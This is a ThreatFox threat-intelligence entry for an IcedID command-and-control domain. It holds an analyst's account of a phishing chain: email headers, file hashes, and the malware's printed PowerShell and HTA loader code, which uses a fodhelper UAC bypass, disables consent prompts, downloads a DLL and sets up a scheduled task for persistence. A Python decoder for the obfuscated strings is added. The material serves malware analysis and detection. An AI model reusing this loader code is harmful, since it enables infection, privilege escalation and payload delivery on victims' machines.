ThreatFox IOC Database

You are viewing the ThreatFox database entry for domain ilekvoyn.com.

Database Entry

IOC ID: 628465
IOC: ilekvoyn.com
IOC Type: domain
Threat Type: botnet_cc
Malware: IcedID
Malware alias: BokBot, IceID
Confidence Level: high (100%)
First seen: 2022-05-23 16:36:12 UTC
Last seen: 2023-09-29 09:38:30 UTC
UUID: 755d79f8-dab6-11ec-ae87-42010aa4000a
Reporter: AndreGironda
Reward: 5 credits from ThreatFox
Tags: bokbot, IcedID
Reference: https://tria.ge/220523-tqthmsefd4

AndreGironda
MITRE T1566.001
Date: Mon, 23 May 2022 14:30-15:00 +0000
Received: from pv55.mxout.mta2.net (178.33.242.55)
From: Accountant General <accountant@samco.in>
Subject: Invoice #0000467
Message-Id: <4ugwtpswvg8i.jofj-vaxRc1lGyAU3FQsqg2@tracking.samco.in>
Reply-To: Accountant General <accountant@samco.in>
Sender: Accountant General <accountant@samco.in>
X-Msg-EID: jofj-vaxRc1lGyAU3FQsqg2
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="=-eZCfDm3T9GjaJt+saZgjTjDg51dE5O00y3WKyw=="
Return-Path: bounces+jofj-vaxRc1lGyAU3FQsqg2@postman.samco.in
Attachment Name: Invoice.zip
Zipfile SHA256: 1875f24165d7566034ec526791cfdadf914944c253c209309e8bb9aeb0348cce
Unzipped LNK Name: Invoice.lnk
LNK SHA256: afa9e0d6f862042f965ae97493df90d46daeb96df9324748450e653ee5d41f67

LNK Forensics --
"target_full_path","target_modification_time","target_access_time","target_creation_time","target_size","target_hostname"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","2018-02-02T18:20:52Z","2018-02-02T18:20:55Z","2018-02-02T18:20:52Z","431616","win-o0lec37vl9i"

LNK Obfuscated Execution --
<#t^ Jm&U'@LFD#>$GbPGyMRdDAirQUbvqjQAx=@(11809,11815,11804,11816,11797,11732,11804,11816,11816,11812,11815,11758,11747,11747,11799,11811,11810,11800,11801,11814,11797,11800,11805,11811,11746,11816,11818,11747,11748,11757,11756,11755,11750,11753,11755,11752,11746,11804,11816,11797);<#t^ Jm&U'@LFD#>$BBoVmbBDLYdvTJUdVS=@(11773,11769,11788);<#t^ Jm&U'@LFD#>function cdeKZpFQIyiV($oPKtzKWXzxtzS){$PVgdIPltaOUo=11700;<#t^ Jm&U'@LFD#>$sRAmdtGLph=$Null;foreach($psxWAlYvqot in $oPKtzKWXzxtzS){$sRAmdtGLph+=[char]($psxWAlYvqot-$PVgdIPltaOUo)};return $sRAmdtGLph};sal OSUDVsWazGlXlQmLc (cdeKZpFQIyiV $BBoVmbBDLYdvTJUdVS);<#t^ Jm&U'@LFD#>OSUDVsWazGlXlQmLc((cdeKZpFQIyiV $GbPGyMRdDAirQUbvqjQAx))

LNK Deobfuscated Execution --
mshta (Stage 1 Below)

Stage 1 URL: hXXps://conderadio[.]tv/09872574.hta
HTA SHA256: ce97847dceb27aabbc144256fcf65868e78e829935e7320dcd67ec949908dff8

VBScript Execution --
Start-Sleep -s 10; function ddnEW(){$aeTpD = $env:Temp + '\' + 'ZDqcC.bat';'if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" % * && exit'| Out-File -FilePath $aeTpD -Encoding Ascii;'@ECHO OFF' | Out-File -FilePath $aeTpD -Encoding Ascii -Append;'powershell.exe -ExecutionPolicy UnRestricted Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0' | Out-File -FilePath $aeTpD -Encoding Ascii -Append;'start /b "" cmd /c del "%~f0" && exit' | Out-File -FilePath $aeTpD -Encoding Ascii -Append;'exit' | Out-File -FilePath $aeTpD -Encoding Ascii -Append;New-Item 'HKCU:\Software\Classes\ms-settings\Shell\Open\command' -Value "$aeTpD" -Force;New-ItemProperty -Path 'HKCU:\Software\Classes\ms-settings\Shell\Open\command' -Name 'DelegateExecute' -Value '' -Force;Start-Process 'C:\Windows\System32\fodhelper.exe';sleep(1);Remove-Item 'HKCU:\Software\Classes\ms-settings\' -Recurse -Force}ddnEW ; function tsabfjPqssS($unOzwS, $OvavotsBuGR){[IO.File]::WriteAllBytes($unOzwS, $OvavotsBuGR)};function DwmqrcY($nQwJVlHaFmFtlaGcXC){Start-Sleep -s 10; $tFRNOMsGELdJNI = $jiWbjAiBykCyNJaDU + 'kywdT.bat';'if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" % * && exit'| Out-File -FilePath $tFRNOMsGELdJNI -Encoding Ascii;'@ECHO OFF' | Out-File -FilePath $tFRNOMsGELdJNI -Encoding Ascii -Append;'powershell.exe function tXIPlkvsktLPL ($hyUQNAjDGWycUo){ $mXzmkJZcEjqHY = ''Core update check''; $MAVXCzBKIjuPJeFnAJ = @{ Action = (New-ScheduledTaskAction -Execute "Rundll32.exe" -Argument ''' + " $nQwJVlHaFmFtlaGcXC" + ',' + 'DllRegisterServer' + '''); Trigger = (New-ScheduledTaskTrigger -Once -At(Get-Date).AddSeconds(5)); TaskName = $mXzmkJZcEjqHY; Description = ''Core updating process.''; TaskPath = ''UpdateCheck''; RunLevel = ''Highest''}; Register-ScheduledTask @MAVXCzBKIjuPJeFnAJ -Force}; tXIPlkvsktLPL ' + " $nQwJVlHaFmFtlaGcXC" | Out-File -FilePath 
$tFRNOMsGELdJNI -Append -Encoding Ascii;'start /b "" cmd /c del "%~f0" && exit' | Out-File -FilePath $tFRNOMsGELdJNI -Encoding Ascii -Append;'exit' | Out-File -FilePath $tFRNOMsGELdJNI -Encoding Ascii -Append;New-Item 'HKCU:\Software\Classes\ms-settings\Shell\Open\command' -Value "$tFRNOMsGELdJNI" -Force;$HEHIUOtOjm = '\Shell\Open\command';New-ItemProperty -Path ('HKCU:\Software\Classes\ms-settings' + $HEHIUOtOjm) -Name 'DelegateExecute' -Value '' -Force;Start-Process (bgzoPpjspLRP @(49559,49550,49584,49579,49597,49602,49592,49603,49611,49607,49584,49575,49613,49607,49608,49593,49601,49543,49542,49584,49594,49603,49592,49596,49593,49600,49604,49593,49606,49538,49593,49612,49593));sleep(1);Remove-Item 'HKCU:\Software\Classes\ms-settings\' -Recurse -Force}function iOAOUBsNKOQTL($tsabfjPqssS){$ABsORayAFtO=(bgzoPpjspLRP @(49564,49597,49592,49592,49593,49602));$apjjQmaupU=(Get-ChildItem $tsabfjPqssS -Force);$apjjQmaupU.Attributes=$apjjQmaupU.Attributes -bor ([IO.FileAttributes]$ABsORayAFtO).value__};function ODhMgbboFzialcxnwG($bCKqYPTZfkLwDhkesO){$VkFPPoSbyZDmswv = New-Object (bgzoPpjspLRP @(49570,49593,49608,49538,49579,49593,49590,49559,49600,49597,49593,49602,49608));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$OvavotsBuGR = $VkFPPoSbyZDmswv.DownloadData($bCKqYPTZfkLwDhkesO);return $OvavotsBuGR};function bgzoPpjspLRP($ijOFXfSsGv){$qcJvBqHjjRMAM=49492;$mWXwQuWtsP=$Null;foreach($AVxVYUjDry in $ijOFXfSsGv){$mWXwQuWtsP+=[char]($AVxVYUjDry-$qcJvBqHjjRMAM)};return $mWXwQuWtsP};function TYLJgxivDIf(){$jiWbjAiBykCyNJaDU = $env:Temp + '\';$UVpqEEPwIlO = $jiWbjAiBykCyNJaDU + '1.dll'; if (Test-Path -Path $UVpqEEPwIlO){DwmqrcY $UVpqEEPwIlO;}Else{ $ZoJBsS = ODhMgbboFzialcxnwG (bgzoPpjspLRP @(49596,49608,49608,49604,49607,49550,49539,49539,49591,49603,49602,49592,49593,49606,49589,49592,49597,49603,49538,49608,49610,49539,49541,49538,49592,49600,49600));tsabfjPqssS $UVpqEEPwIlO $ZoJBsS;DwmqrcY $UVpqEEPwIlO;};iOAOUBsNKOQTL 
$UVpqEEPwIlO;;;;;}TYLJgxivDIf;

Stage 2 URL: hXXps://conderadio[.]tv/1.dll
IcedID Stage DLL SHA256: 3dfe63d2c9a7e2f848d2f92171cc577158318b4e9cb62e74ec603be84ba13109
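Both loader stages in the comment above hide their strings the same way: an integer array where each element minus a per-script constant (11700 in the LNK stage, 49492 in the HTA stage) is one character, fed through a tiny foreach loop into [char]. The decoder below is an added example, not part of the ThreatFox entry or the reporter's comment; it takes the page's own LNK command line as input, reads the offset out of the [char] loop instead of hard-coding it, and defangs the recovered URL before printing so the output matches the "LNK Deobfuscated Execution" line above.

```python
import re

# Obfuscated LNK command line copied from the analyst comment above (the sample
# under "LNK Obfuscated Execution"); it is the decoder's input, not new code.
LNK_SCRIPT = (
    r"<#t^ Jm&U'@LFD#>$GbPGyMRdDAirQUbvqjQAx=@(11809,11815,11804,11816,11797,11732,11804,"
    r"11816,11816,11812,11815,11758,11747,11747,11799,11811,11810,11800,11801,11814,11797,"
    r"11800,11805,11811,11746,11816,11818,11747,11748,11757,11756,11755,11750,11753,11755,"
    r"11752,11746,11804,11816,11797);<#t^ Jm&U'@LFD#>$BBoVmbBDLYdvTJUdVS=@(11773,11769,"
    r"11788);<#t^ Jm&U'@LFD#>function cdeKZpFQIyiV($oPKtzKWXzxtzS){$PVgdIPltaOUo=11700;"
    r"<#t^ Jm&U'@LFD#>$sRAmdtGLph=$Null;foreach($psxWAlYvqot in $oPKtzKWXzxtzS)"
    r"{$sRAmdtGLph+=[char]($psxWAlYvqot-$PVgdIPltaOUo)};return $sRAmdtGLph};"
    r"sal OSUDVsWazGlXlQmLc (cdeKZpFQIyiV $BBoVmbBDLYdvTJUdVS);<#t^ Jm&U'@LFD#>"
    r"OSUDVsWazGlXlQmLc((cdeKZpFQIyiV $GbPGyMRdDAirQUbvqjQAx))"
)


def strip_block_comments(script: str) -> str:
    """Drop the <# ... #> junk comments the loader sprinkles between statements."""
    return re.sub(r"<#.*?#>", "", script, flags=re.S)


def find_offset(script: str) -> int:
    """Resolve the constant subtracted in [char]($x-$offset) back to its literal value."""
    loop = re.search(r"\[char\]\(\$\w+-\$(\w+)\)", script)
    if loop is None:
        raise ValueError("no [char](...-$offset) decode loop found")
    assign = re.search(r"\$" + re.escape(loop.group(1)) + r"=(\d+);", script)
    if assign is None:
        raise ValueError(f"offset variable ${loop.group(1)} has no literal assignment")
    return int(assign.group(1))


def decode_values(values, offset: int) -> str:
    """Apply the loader's own transform: each integer minus the offset is one character."""
    return "".join(chr(int(v) - offset) for v in values)


def decode_arrays(script: str) -> list:
    """Decode every @(n,n,...) integer array in the script, in order of appearance."""
    clean = strip_block_comments(script)
    offset = find_offset(clean)
    return [decode_values(a.split(","), offset) for a in re.findall(r"@\(([\d,]+)\)", clean)]


def defang(text: str) -> str:
    """Defang scheme and host so decoded URLs can be pasted into a report safely."""
    text = re.sub(r"\bhttp(s?)://", r"hXXp\1://", text)
    return re.sub(r"(hXXps?://)([^/\s]+)", lambda m: m.group(1) + m.group(2).replace(".", "[.]"), text)


if __name__ == "__main__":
    for s in decode_arrays(LNK_SCRIPT):
        print(defang(s))  # mshta hXXps://conderadio[.]tv/09872574.hta, then IEX
```

The same decode_values() routine applies to the HTA stage with offset 49492; for example the six-element array passed to [IO.FileAttributes] in that script decodes to the attribute name Hidden.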

Malware Samples

The table below documents recent malware samples observed that are associated with this indicator of compromise (IOC).

Time stamp (UTC)      SHA256 hash
2022-05-24 02:21:51   0581f0bf260a11a5662d58b99a82ec756c9365613833bce8f102ec1235a7d4f7